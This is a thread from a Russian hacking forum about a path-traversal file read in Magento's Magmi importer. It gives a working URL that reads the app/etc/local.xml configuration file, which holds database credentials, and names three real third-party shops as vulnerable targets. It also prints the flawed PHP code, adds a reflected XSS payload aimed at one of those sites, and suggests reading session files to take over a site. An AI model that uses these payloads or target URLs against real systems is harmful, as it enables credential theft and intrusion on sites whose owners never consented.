Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Локальня читалка Magento (https://forum.antichat.xyz/showthread.php?t=422425)

winstrool 17.02.2015 21:44
Локальня читалка Magento:

http://localhost/magmi/web/download_file.php?file=../../app/etc/local.xml

Пример уязвимых урлов:

Цитата:
Сообщение от None
_http://bentextiles.com/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://mengotti-online.com/shop/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://www.lowellcraft.com/magmi/web/download_file.php?file=../../app/etc/local.xml
Уязвимый код:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"file"[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=@[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]error_get_last[/COLOR][COLOR="#007700"]();

if([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])

{

@[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]);

}

if([/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#FF8000"]// Extract the type of file which will be sent to the browser as a header

[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]filetype[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]// Get a date and timestamp

[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"F j, Y, g:i a"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#FF8000"]// Send file headers

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-type:[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-Disposition: attachment;filename="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-Transfer-Encoding: binary"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: no-cache'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]// Send the file contents.

[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);

}

else

{

[/COLOR][COLOR="#0000BB"]print_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]);

}[/COLOR][/COLOR
P.S: В гугле по этой баге ничего не нашел.

P.S:

Обнаружил случайно в пакете с обновлением фикса баги

_http://www.exploit-db.com/exploits/35052/

сам фикс с багой, читалкой на гитхабе

https://github.com/dweeves/magmi-git Magento CE 1.8.x & 1.9.x

Strilo4ka 18.05.2015 21:30
Хм, Magento на FreeBSD, возможно, можно сразу скомпроментировать, так как при чтении директории(это тоже файл!) можно получить список файлов. Сессия по умолчанию пишется в файловую си-му в install-dir/var/session обычно, в БД редко(в Wizard установщике по дефолту файловая си-ма )

winstrool 06.09.2015 14:53
Может пора спустить в паблик?

BigBear 06.09.2015 16:39
Не стоит

Rebz 07.09.2015 11:26
В целом, стоит - не стоит, решать автору

winstrool 07.09.2015 11:42
спускай, а на гитхабе сделаем ссылку на пост)) пускай фиксят, бага все равно мало полезная...

P.S:Пасивная XSS

http://www.lowellcraft.com/magmi/web/ajax_gettime.php

POSTrefix=alert('xss')

magmi/web/ajax_gettime.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
При GET запросе на примерной площадке сробатывает мод секьюрети

winstrool 06.01.2016 16:59
ППЦ(((( https://www.trustwave.com/Resources...mmerce-platform-Magento-targeted-in-the-wild/ - себе багу присвоили, разместили статью от 13.10.2015

ZodiaX 06.01.2016 19:11
Оперативно они...

хм, похожая бага тоже от февраля https://packetstormsecurity.com/file...gmi-lfixss.txt

winstrool 06.01.2016 20:54
Цитата:
Сообщение от ZodiaX
ZodiaX said:

Оперативно они...
хм, похожая бага тоже от февраля
https://packetstormsecurity.com/file...gmi-lfixss.txt
Да, только там при правильном подходе идет выполнения php кода, а тут просто читалка


Время: 02:56